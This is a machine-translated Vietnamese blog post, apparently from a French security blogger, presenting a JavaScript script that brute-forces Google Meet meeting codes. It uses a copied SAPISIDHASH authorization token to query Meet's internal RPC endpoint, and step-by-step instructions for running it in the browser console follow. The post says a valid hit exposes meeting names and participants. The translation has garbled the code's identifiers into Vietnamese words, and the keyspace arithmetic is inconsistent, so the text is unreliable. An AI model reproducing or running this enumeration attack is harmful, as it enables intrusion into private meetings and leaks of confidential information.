Visio – Bị mắc kẹt trong Google Meet | Dyrk, Dyna gặp – Visio

Gặp Visio

Randomize = () => Dico = dico.Tách ra (”).Bản đồ (value => (< value, sort: Math.random() >)).chính tả ((a, b) => a.Chính tả – b.Đánh vần).BẢN ĐỒ ((< value >) => Giá trị).Tham gia (”),
NewPotypeDkey = () => “xxx-xxxx-xxx”.Tách ra (”).Bản đồ (c => c == ‘-‘?Chuỗi C.Fromcharcode (toán học.Tầng (toán học.Ngẫu nhiên ()*25) +97)).Tham gia (”),
Key = newPotyerNkey (), bộ đếm = 20;
Tiếp theo = () => Khóa.Tách ra (”).Bản đồ (e => e == ‘-‘ ? E: DiCo [Dico.Indexof (e) + 1> = dico.chiều dài ? 0: DiCo.Indexof (e) + 1])).Tham gia (”),
Counter = 0;
meetLink = ‘https: // gặp gỡ.Google.com/’, có sẵn toe = () => xhr = new xmlhttprequest ();
If (bộ đếm ++> = 20) bộ đếm = 0;
Key = newPotyerNkey ();
Ngẫu nhiên ();
>
Key = next ();
XHR.Mở (‘Nhận’, MeetLink + Key);
XHR.AddEventLisner (‘load’, (e) => tìm nạp (meetLink.Concat (“/$ rpc/google.RTC.các cuộc họp.V1.Các cuộc họp,
“Loại nội dung”: “Ứng dụng/X-Protobuf”,
“X-goog-adep-key”: E.mục tiêu.trách nhiệm.Khớp (/\ [“https \: \/\/gặp \.Google\.com \ “\,” ([A-A-Z0-9 \ _ \-]) “\]/) [1],
“X-goog-authuse”: “0”,
“X-goog-retode-réspose-if-Executable”: “Base64”,
“X-goog-meting-Identifier”: btoa (‘\ b \ x02 \ x12 \ f’.Concat (khóa)),
>,
“Cơ thể”: “\ n \ f”.Concat (khóa, “0 \ u0001”),
“Phương pháp”: “Bài”
>).Sau đó (e => e.Chữ ())
.sau đó (e => setTimeout (có sẵn, 100);
Bảng điều khiển.Đăng nhập (MeetLink.Concat (khóa).Beautifydisplay (38), (e.Thay thế (/[^a-za-z0-9]/g, “”)+””).Beautifydisplay (38));
>);
>);
XHR.Gửi ();
>;
Sợi dây.nguyên mẫu.Beautifydisplay = function (kích thước) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >kích cỡ ? TXT.Chiều dài: Kích thước)).Subrtr (0, kích thước).Concat (‘|’); >,
Bảng điều khiển.Thông thoáng ();
có sẵn ();
>) ()

Dyrk

Hiện đang làm việc trong lĩnh vực an ninh mạng, tôi thường xuyên phải đối mặt với những tình huống khá tầm thường.

Mới nhất, sự xâm nhập của một người trong một cuộc họp .
May mắn thay, vì sự an toàn, Google Meet bao gồm một tính năng cho phép cả hai người tham gia cảnh báo rằng một người tìm cách tham gia.

Tuy nhiên, sự kiện này mang đến cho tôi để tự hỏi mình một số câu hỏi .

Sự phức tạp của liên kết Google đáp ứng

Trước hết, làm thế nào để một người có thể kết nối với một liên kết gặp gỡ mà không được mời đến ?

Chúng ta phải xem xét tính đơn giản của liên kết: https: // google.gặp.com/Xxx -yyyy -zzzz

Xxx -yyyy -zzzz chỉ là các ký tự bảng chữ cái giữa A và Z, tức là 27 kết hợp có thể cho mỗi ký tự.

Đối với các nhà toán học, do đó có:

27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 có thể kết hợp .

Tuổi thọ của Google gặp liên kết

Mặc dù bây giờ chúng tôi có thể hiểu rõ hơn về cách các liên kết của các trái phiếu hội nghị “Google Meet” của chúng tôi được xây dựng, nhưng có một khía cạnh rất quan trọng để tính đến . Tuổi thọ của liên kết Google Meet !

Thật vậy, mọi người đều có thể tạo các cuộc họp của Google Meet trong một vài cú nhấp chuột.
Nhưng sau một vài ngày, tuần hoặc vài tháng . Các liên kết không còn hợp lệ.

Do đó, các liên kết được tạo ra có thời gian hợp lệ nhất định .

Ngoại lệ tạo ra các sự kiện “định kỳ” và đây là nơi nó trở nên thú vị.
Trong kinh doanh, có nhiều cơ hội để tổ chức thường xuyên (nhóm / kinh doanh, hàng ngày, hàng tuần, hàng tháng,, . )).
Khi một nhân viên tạo ra loại sự kiện này trong chương trình nghị sự của họ, tự động liên kết Google Meet được tạo. Cái này là bất biến.
Vì vậy, bạn sẽ có cùng một liên kết mỗi lần cho sự kiện này.

Với một chút JavaScript và Brute Force ?

Với tất cả các yếu tố này, chúng tôi hiện được trang bị để quét tất cả các khả năng và đạt được xác suất cao để phát hiện các liên kết đến các videoconociates !

Vì vậy, tôi có một chút bảo hiểm retro của Google Meet để viết mã JavaScript sẽ thử một số lượng kết hợp vô hạn

(C) Dyrk.Org 2023-2024 – Meet’s Roulette
(1) Chạy tập lệnh này trên https: // google.gặp.com

(2) Tìm và cập nhật biến ủy quyền với mã thông báo ủy quyền hợp lệ trong các tiêu đề “Yêu cầu XHR” của Googles

Đặt ủy quyền = “Sapisidhash xxxxxxxxxxxxxxxx_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx“, dico =” abcdefghijklmnopqrstuvxz “,

Randomize = () => Dico = dico.Tách ra (”).Bản đồ (value => (< value, sort: Math.random() >)).chính tả ((a, b) => a.Chính tả – b.Đánh vần).BẢN ĐỒ ((< value >) => Giá trị).Tham gia (”),
NewPotypeDkey = () => “xxx-xxxx-xxx”.Tách ra (”).Bản đồ (c => c == ‘-‘?Chuỗi C.Fromcharcode (toán học.Tầng (toán học.Ngẫu nhiên ()*25) +97)).Tham gia (”),
Key = newPotyerNkey (), bộ đếm = 20;
Tiếp theo = () => Khóa.Tách ra (”).Bản đồ (e => e == ‘-‘ ? E: DiCo [Dico.Indexof (e) + 1> = dico.chiều dài ? 0: DiCo.Indexof (e) + 1])).Tham gia (”),
Counter = 0;
meetLink = ‘https: // gặp gỡ.Google.com/’, có sẵn toe = () => xhr = new xmlhttprequest ();
If (bộ đếm ++> = 20) bộ đếm = 0;
Key = newPotyerNkey ();
Ngẫu nhiên ();
>
Key = next ();
XHR.Mở (‘Nhận’, MeetLink + Key);
XHR.AddEventLisner (‘load’, (e) => tìm nạp (meetLink.Concat (“/$ rpc/google.RTC.các cuộc họp.V1.Các cuộc họp,
“Loại nội dung”: “Ứng dụng/X-Protobuf”,
“X-goog-adep-key”: E.mục tiêu.trách nhiệm.Khớp (/\ [“https \: \/\/gặp \.Google\.com \ “\,” ([A-A-Z0-9 \ _ \-]) “\]/) [1],
“X-goog-authuse”: “0”,
“X-goog-retode-réspose-if-Executable”: “Base64”,
“X-goog-meting-Identifier”: btoa (‘\ b \ x02 \ x12 \ f’.Concat (khóa)),
>,
“Cơ thể”: “\ n \ f”.Concat (khóa, “0 \ u0001”),
“Phương pháp”: “Bài”
>).Sau đó (e => e.Chữ ())
.Sau đó (e =>

SetTimeout (có sẵn, 100);
Bảng điều khiển.Đăng nhập (MeetLink.Concat (khóa).Beautifydisplay (38), (e.Thay thế (/[^a-za-z0-9]/g, “”)+””).Beautifydisplay (38));
>);
>);
XHR.Gửi ();
>;
Sợi dây.nguyên mẫu.Beautifydisplay = function (kích thước) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >kích cỡ ? TXT.Chiều dài: Kích thước)).Subrtr (0, kích thước).Concat (‘|’); >,
Bảng điều khiển.Thông thoáng ();
có sẵn ();
>) ()

Để vận hành tất cả điều này, nó sẽ là cần thiết:

Mở trang https: // gặp gỡ.Google.com
Mở bảng điều khiển nhà phát triển
Trong tab “Mạng”, hãy lọc Fetch / XHR & khôi phục mã thông báo mã thông báo“Ủy quyền”
Sao chép và dán mã nguồn ở trên và đặt vào nơi cho biết mã thông báo.
Xác thực với phím “Lối vào” trên bàn phím của bạn.

Phục hồi mã thông báo “ủy quyền”:

Đối với những người tò mò, đây là kết quả của kịch bản này trong hành động sẽ trông như thế nào.
Do đó, chúng tôi lưu ý các dòng thông báo cho chúng tôi rằng không gian để quay video không tồn tại.
Và những người khác đưa chúng ta lên mã thông báo của hội nghị ! Do đó chỉ ra rằng liên kết là hợp lệ;)

Tuy nhiên, đừng mong đợi sẽ rơi trong vài giây trên một liên kết gặp gỡ ^^
(Trừ khi bạn là một người đàn ông may mắn nhỏ)
Bạn sẽ cần phải kiên nhẫn tuyệt vời, để nó chạy ít nhất nửa giờ.

Phần kết luận

Đừng hoảng sợ rằng có một số lượng may mắn hơn để tìm thấy một liên kết Google Meet hợp lệ so với chiến thắng LOTO.

Chú ý ! Một người bắt gặp một liên kết đáp ứng hợp lệ truy cập vào một số thông tin nhất định mà không cần phải kết nối:
Tên của cuộc họp (do đó tránh trượt thông tin bí mật) và những người tham gia được kết nối (tất cả hoặc một trò chơi).

Gặp Visio

Cướp trực tuyến

Sking S-Sell Sticker Online Robbery

Người chơi